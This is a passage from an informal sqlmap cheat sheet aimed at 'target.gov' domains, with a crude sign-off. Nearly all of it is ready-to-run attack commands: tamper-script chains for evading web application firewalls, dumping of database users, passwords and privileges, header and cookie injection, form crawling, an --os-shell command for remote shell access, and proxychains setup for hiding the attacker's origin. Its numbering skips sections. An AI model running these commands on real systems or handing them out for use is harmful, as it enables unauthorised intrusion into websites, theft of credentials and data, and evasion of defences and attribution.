Mapped
Mapped
tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --
identify-waf --random-agent --batch
- sqlmap -u "target.gov"
tamper=between.py,charencode.py,charunicodeencode.py,equaltolike.py,greatest.py,mul
tiplespaces.py,nonrecursivereplacement.py,percentage.py,randomcase.py,securesphere.
py,sp_password.py,space2comment.py,space2dash.py,space2mssqlblank.py,space2mysqldas
h.py,space2plus.py,space2randomblank.py,unionalltounion.py,unmagicquotes.py --
dbms=mssql --batcH
3. SPECIAL COMMAND
# upload on header PUT
- sqlmap --method=PUT -u "target.gov" --headers="referer:*" --batch
# retrieve information
- sqlmap -u "target.gov" --users --passwords --privileges --roles --threads=10 --
batch
# tajuk refferer
- sqlmap -u "target.gov" --headers="referer:*" --batch
# Verbose
- sqlmap -u "target.gov" -v 3 --batch
# scanning form
- sqlmap -u "target.gov" -u "target.gov/admin/login.php" --form --dbs --batch
# force ssl/https
- sqlmap -r a.req --force-ssl --users --batch
# costumizing injection
> set a suffix injection
- sqlmap -u "target.gov/?id=1" -p id --suffix="-- " --batch
> set a prefix injection
- sqlmap -u "target.gov/?id=1" -p id --prefix="') " --batch
# request injection
- sqlmap -u "target.gov/test.php?id=1" -p id --batch
- sqlmap -u "target.gov/test.php?id=1" * --batch
# using cookies
- sqlmap -u "target.gov/enter.php" --cookie="" -u "target.gov/index.php?id=1" --dbs
--batch
# multi threading
- sqlmap -u "target.gov/page.php?id=1" --dbs --threads 5 --batch
# null connection
- sqlmap -u "target.gov/page.php?id=1" --dbs --null-connection --batch
# output prediction
- sqlmap -u "target.gov/page.php?id=1" -D database -T user -c users,password --dump
--predict-output --batch
# checking privilages
- sqlmap -u "target.gov/page.php?id=1" --privileges --batch
# using proxxy
- sqlmap --proxy="127.0.0.1:8080" -u "target.gov/page.php?id=1" --dbs --batch
4. CRAWLING INJECTION
- sqlmap -u "target.gov" --crawl=1 --forms --dbs --batch
6. PARAMETER INJECTION
- sqlmap -u "target.gov" --banner --dbs --batch
8. SQLMAP OS SHELL
> basic operating system shell ( Linux )
- sqlmap -u "target.gov/leet.php?id=1337" --os-shell --batch
> setting configuration proxychains using text editor terminal like nano,vim,micro
and etc
- micro /etc/proxychains.conf
WARNING !
listen
delete hastag coment ( # ) in dynamic_chain, and add hastag coment ( # ) in
strict_chain one more and delete hastag coment ( # ) in random_chain
fix line in hastag coment # proxylist format, example you just space line so that
it is parallel
and then save file configuration
DONE
thanks bitch, i'm so tired write this tutorials fuck!!!